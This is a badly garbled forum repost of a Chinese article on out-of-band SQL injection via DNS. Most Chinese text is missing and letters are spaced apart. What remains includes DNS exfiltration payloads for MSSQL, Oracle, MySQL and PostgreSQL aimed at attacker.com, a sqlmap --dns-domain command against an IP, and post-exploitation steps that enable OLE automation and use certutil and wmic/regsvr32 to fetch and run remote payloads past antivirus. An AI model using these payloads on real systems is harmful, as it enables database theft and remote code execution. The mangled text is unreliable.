[6222] 2019-10-13_利用DNS实现SQL注入带外查询

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-17
2019-10-13_利用DNS实现SQL注入带外查询 D N S S Q L 4 c k 1 k   E   2 0 1 9 - 1 0 - 1 3 N o . 1 N o . 1 使 N o . 2 N o . 2 S Q L s q l m a p o s - s h e l l g e t s h e l l s h e l l N o . 3 N o . 3 O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B O O B           S Q L i i n b a n d ,   i n f e r e n c e   o u t - o f - b a n d         I n b a n d 使 W e b W e b u n i o n 使 w e b S Q L e r r o r - b a s e d S Q L D B M S         I n f e r e n c e I n f e r e n c e S Q L         I n f e r e n c e b o o l t i m e - b a s e d t r u e / f a l s e W e b ( s l e e p / b e n c h m a r k )         O u t - o f - b a n d   ( O O B ) i n b a n d 使 H T T P D N S / i n f e r e n c e 使 O O B 便         H T T P O O B S Q L H T T P G E T 访 广 使 I N S E R T / U P D A T E S Q L N o . 4 N o . 4 D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S D N S
d n s 1 .         使 b u r p   s u i t e   B u r p   C o l l a b o r a t o r   c l i e n t 便 2 .         h t t p p y t h o n 3 .         使 c e y e . i o d n s l o g 4 .         使 s q l m a p d n s - d o m a i n N o . 5 N o . 5 1 . M S S Q L 使 m a s t e r . d b o . x p _ d i r t r e e D N S 访 D E C L A R E   @ d a t a   v a r c h a r ( 1 0 2 4 ) ;         S E L E C T   @ d a t a   = ( S E L E C T   f o o   F R O M   b a r ) ;         E X E C ( ' m a s t e r . . x p _ d i r t r e e ' +   @   d a t a   + ' . a t t a c k e r . c o m     f o o   $ ' ) ; 使 x p _ f i l e e x i s t s x p _ s u b d i r s ;   2 . O r a c l e U T L _ I N A D D R . G E T _ H O S T _ A D D R E S S U T L _ H T T P . R E Q U E S T H T T P _ U R I T Y P E . G E T C L O B D B M S _ L D A P . I N I T
S E L E C T   D B M S _ L D A P . I N I T S E L E C T   f o o   F R O M   b a r | | ' . a t t a c k e r . c o m ' 8 0 F R O M   D U A L ; 3 . M y S Q L L O A D _ F I L E S E L E C T   L O A D _ F I L E C O N C A T ' ' S E L E C T   f o o   F R O M   b a r ' . a t a c k e r . c o m ' ) ) ; 4 . P o s t g r e S Q L p o s t g r e s q l 使 C O P Y         D R O P   T A B L E   I F   E X I S T S   t a b l e _ o u t p u t ;         C R E A T E   T A B L E   t a b l e _ o u t p u t ( c o n t e n t   t e x t ) ;         C R E A T E   O R   R E P L A C E   F U N C T I O N   t e m p _ f u n c t i o n ( )         R E T U R N S   V O I D   A S   $ $         D E C L A R E   e x e c _ c m d   T E X T ;         D E C L A R E   q u e r y _ r e s u l t   T E X T ;         B E G I N                 S E L E C T   I N T O   q u e r y _ r e s u l t   ( S E L E C T   f o o   F R O M   b a r ) ;                 e x e c _ c m d   : =   E ' C O P Y   t a b l e _ o u t p u t ( c o n t e n t )   F R O M   E ' ' | | q u e r y _ r e s u l t | | E ' . a t t a c k e r . c o m f o o b a r . t x t ' ' ;                 E X E C U T E   e x e c _ c m d ;         E N D ;         $ $   L A N G U A G E   p l p g s q l   S E C U R I T Y   D E F I N E R ;         S E L E C T   t e m p _ f u n c t i o n ( ) ; N o . 6 N o . 6 s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n s q l m a p   - - d n s - d o m a i n o p e n d n s . o n l i n e u i d s q l m a p   - u   ' h t t p : / / 1 8 8 . 1 6 6 . 2 9 . 1 1 4 / t e s t . p h p ? u i d = 1 '   - p   u i d   - - d b s   - - t e c h n i q u e   T   - - d b m s   m s s q l   - - l e v e l   5   - - r i s k   3   - - d n s - d o m a i n   o p e n d n s . o n l i n e
使 t c p d u m p 5 3 d u d p t c p d u m p   - i   e t h 0   - s   0   - A   - v v v   ' u d p   a n d   d s t   p o r t   5 3 s q l m a p d n s N o . 7 N o . 7
d n s W i n d o w s   2 0 0 8 M S S Q L D B A 3 6 0 + E S E T   N O D 3 2   A n t i v i r u s o s - s h e l l s h e l l                   1 . x p _ c m d s h e l l 使                   2 .                   3 . o s _ s h e l l 1 . s q l m a p x p _ c m d s h e l l s p _ o a c r e a t e O L E         E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ;             R E C O N F I G U R E   W I T H   O V E R R I D E ;             E X E C   s p _ c o n f i g u r e   ' O l e   A u t o m a t i o n   P r o c e d u r e s ' ,   1 ;         R E C O N F I G U R E   W I T H   O V E R R I D E ;             E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   0 ;   s p _ o a c r e a t e O L E w s c r i p t . s h e l l 使 s p _ o a m e t h o d O L E c m d . e x e w h o a m i c w h o . t x t d e c l a r e   @ s h e l l   i n t   e x e c   s p _ o a c r e a t e   ' w s c r i p t . s h e l l ' , @ s h e l l   o u t p u t   e x e c   s p _ o a m e t h o d   @ s h e l l , ' r u n ' , n u l l , ' c : w i n d o w s s y s t e m 3 2 c m d . e x e   / c w h o a m i   > C : w h o . t x t ' 2 . 使 d n s l o g 使 b u r p   c o l l a b o r a t o r   p y t h o n   h t t p . s e r v e r 3 . 使 o s - s h e l l > c e r t u t i l   - u r l c a c h e   - s p l i t   - f   h t t p : / / x x . x x . x x . x x : 8 0 0 0 / 1 . e x e p a y l o a d 4 . 使 w m i c   p r o c e s s   c a l l   c r e a t e   " r e g s v r 3 2   / s   / n   / u / i : h t t p : / / x x x . x x x . x x x . x x x : 8 0 8 6 / p . t x t   s c r o b j . d l l " 1 . e x e
N o . 8 N o . 8 W e b   1 3 - 3 0 K 1 + 广 3 1 . ; 2 . 沿 3 . ; 4 . 5 . W A F b y p a s s 1 . 1 2 . H T T P 3 . C M S 4 . p h p j a v a a s p . n e t 5 . W e b   F u z z 6 . O W A S P   T O P   1 0 7 . W e b 8 . A s p . n e t P y t h o n p h p j a v a
1 . 2 . 3 . C I S S P C I S A C S S L P I S O 2 7 0 0 1 I T I L P M P C O B I T S e c u r i t y + C I S P O S C P 4 . S R C C T F 5 . 6 . 7 . 8 . 稿 1 3 - 3 0 K 2 + 1 . 2 . 3 . 1 . 使 P y t h o n j a v a c / c + + 2 . 使 D j a n g o f l a s k   w e b 使 m y s q l m o n g o D B r e d i s 3 : w e b 4 . 5 . 1 . t c p 2 . g i t h u b 3 : 4 . f r e e b u f 5 .
1 1   V I   广 2 p h o t o s h o p / i l l u s t r a t o r / c o r e l d r e w / 3 1 9 1   s t r a t e g y @ d b a p p s e c u r i t y . c o m . c n S R C 1 .     S R C 线 访 2 .     R a n k 3 .     线 4 .     广 5 .         1 .       2 .       3 .     广   s t r a t e g y @ d b a p p s e c u r i t y . c o m . c n
E N D
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则